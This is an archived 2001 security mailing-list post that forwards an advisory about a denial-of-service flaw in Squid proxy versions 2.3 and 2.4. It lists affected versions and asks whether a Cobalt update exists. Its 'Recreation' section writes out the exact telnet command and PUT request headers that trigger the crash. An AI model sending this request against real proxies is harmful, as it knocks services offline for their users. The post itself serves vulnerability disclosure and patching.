[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] Squid Mkdir-only PUT Requests Denial of Service Attack

Subject: [cobalt-security] Squid Mkdir-only PUT Requests Denial of Service Attack
From: deepquest---Code511 <adf@xxxxxxxxxxx>
Date: Tue, 25 Sep 2001 19:15:23 +0200
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

 http://www.securiteam.com/unixfocus/5AP0S0U5FI.html
 http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3354
 
 Vulnerable systems:
                 Squid version 2.4STABLE2
                  Squid version 2.4STABLE1
                  Squid version 2.3STABLE4
                  (All versions of SQUID are assumed to be vulnerable)
 
                  Recreation:
                  $ telnet proxy:3128
                  PUT ftp://whatever:whatever@xxxxxxxxxxxxxxx/ HTTP/1.1
                  Content-type: application/octet-stream
                  Content-length: 0
                  Pragma: no-cache
 
 
 any update for colbat?
 
 
 
 Alexandre Da Fonseca aka Deepquest
 Chief of Technology Officer
 "Ubi solitudinem faciunt, pacem appelant"
 -------------------------------------------------------------
 Code511                                 work:+33-14088-9595
 http://www.code511.com                  cell:+33-66442-1595
 PGP DH/DSS http://www.code511.com/pgp   fax :+33-14722-7278
 -------------------------------------------------------------

Prev by Date: [cobalt-security] ODD LOG log/httpd/ssl_mutex.28568
Next by Date: [cobalt-security] MAC Addresses changed,Qube3
Previous by thread: RE: SV: [cobalt-security] - too many sendmail processes
Next by thread: [cobalt-security] MAC Addresses changed,Qube3

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index